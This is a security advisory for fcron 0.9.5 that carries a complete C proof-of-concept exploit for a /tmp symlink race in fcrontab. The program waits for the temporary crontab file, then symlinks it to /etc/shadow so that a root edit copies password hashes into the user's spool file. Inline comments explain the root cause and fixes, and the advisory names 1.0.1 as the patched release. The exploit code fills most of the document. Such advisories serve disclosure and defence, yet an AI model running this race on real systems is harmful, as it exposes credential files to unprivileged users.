COMMAND

    fcron

SYSTEMS AFFECTED

    fcron 0.9.5

PROBLEM

    _kiss_ found the following.  The attack needs root to update our
    crontab file  (# fcrontab -u kiss -e).   What do we get?   We get
    /etc/shadow (or any other file we want) written into our crontab
    file.

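    This is just a proof of concept.  What we have to do is run the
    exploit below from a normal user shell.  Then, in a root console,
    we update that user's crontab.  After that, just check the
    contents of <user>.orig and you'll find /etc/shadow right there.
    As the listing shows, the program watches /tmp for the temporary
    file that fcrontab creates during the edit and swaps it for a
    symlink once it has been modified; the root-run fcrontab then
    apparently follows the link when it reads the file back by name.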

    /* --------------------------
       fcrontab exploit by _kiss_
       --------------------------
    */
    
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <time.h>
    #include <dirent.h>
    
    #define TRUE 1
    
    /*
     * Proof of concept for a temporary-file symlink race in fcrontab.
     *
     * What the code does, step by step:
     *   1. polls /tmp until a directory entry whose name starts with
     *      "fcrontab" shows up,
     *   2. records that file's modification time and spins until it changes,
     *   3. replaces the path with a symlink to /etc/shadow via `ln -fs`.
     * According to the advisory text, the linked file's contents then end up
     * in <user>.orig in the spool directory once root finishes editing that
     * user's crontab.
     *
     * Defender's reading: the root cause is a privileged program using a
     * file with a predictable name prefix in a world-writable directory and
     * (presumably -- the fcrontab source is not shown here) re-opening it by
     * path after the editor exits. The usual remedies are to keep the
     * temporary file in a directory other users cannot write to, create it
     * with O_CREAT|O_EXCL (e.g. mkstemp), refuse symlinks with O_NOFOLLOW,
     * and keep working on the already-open descriptor instead of the name.
     * The advisory lists 1.0.1 as the fixed release.
     *
     * NOTE(review): this listing is not careful C. main is declared void,
     * strncmp/strcpy/strcat/system are called without <string.h>/<stdlib.h>,
     * the opendir() result is never checked, direntry->d_name is read after
     * closedir() has released the stream, and both 200-byte buffers are
     * filled with unbounded strcpy/strcat. Read it as an illustration of the
     * race, not as dependable code.
     */
    void main() {
    
             struct stat buf;         /* stat() result for the watched file */
             time_t modif1,modif2;    /* mtime before / after the awaited update */
             DIR *dir;
             struct dirent *direntry;
              int found=0;            /* set once a matching entry is seen in /tmp */
              char string[200];       /* "/tmp/" + matched entry name */
              char string2[200];      /* shell command line handed to system() */
    
             printf ("---------------------------------------------\n");
             printf ("              fcrontab exploit by _kiss_\n");
             printf (" Helios Security and Administration (HeliSec)\n\n");
             printf (" Greets: Jet-Li (for teaching me some lessons of shell\n");
             printf ("            that i will need someday) :D\n");
             printf ("---------------------------------------------\n");
    
             /* we wait till /tmp/fcrontab is created */
             /* Busy loop: /tmp is re-opened and rescanned on every pass with no
                sleep, so the process shows up as a CPU-bound poller. */
             printf("\nwaiting for /tmp/fcrontab to be created...\n");
    
             while(!found) {
    
                     dir=opendir("/tmp");
    
                     /* Only the first 8 characters are compared, so any name
                        beginning with "fcrontab" matches. */
                     while ((direntry=readdir(dir))!=NULL) {
                             if (strncmp("fcrontab",direntry->d_name,8)==0)
                                     found=1;
                             if (found==1) break;
                     }
    
                     closedir(dir);
             }
    
             /* Build the full path of the matched file. direntry belongs to the
                directory stream that was closed just above. */
             strcpy(string,"/tmp/");
             strcat(string,direntry->d_name);
    
             /* Spin until stat() on that path succeeds. */
             while (TRUE) {
                     if (stat(string,&buf)!=-1)
                             break;
             }
    
             /* we store date of last modification */
             printf("/tmp/fcrontab created. waiting for the update...\n");
             modif1=buf.st_mtime;
    
             /* we wait till /tmp/fcrontab is updated */
             /* The mtime change is the trigger for the swap below; presumably
                it corresponds to the editor saving the file -- the advisory
                does not spell this out. stat()'s return value is ignored. */
             do {
                     stat(string,&buf);
                     modif2=buf.st_mtime;
             } while (modif1==modif2);
    
             /* we make the symlink */
             /* `ln -fs` replaces the existing path with a link to /etc/shadow.
                A symlink appearing under /tmp that points at a sensitive file
                is the observable artifact of this step. */
             printf("making a symlink to /etc/shadow...\n");
             strcpy(string2,"ln -fs /etc/shadow ");
             strcat(string2,string);
             system(string2);
    
             /* we should now have /etc/shadow in /var/spool/fcron/kiss.orig */
             /* The path is hard-coded for the author's test account "kiss";
                the advisory text refers to it generically as <user>.orig. */
             printf("... now check /var/spool/fcron/kiss.orig\n");
    }

SOLUTION

    A new version has been  released to correct this bug  (1.0.1), and
    it can be found at fcron.free.fr.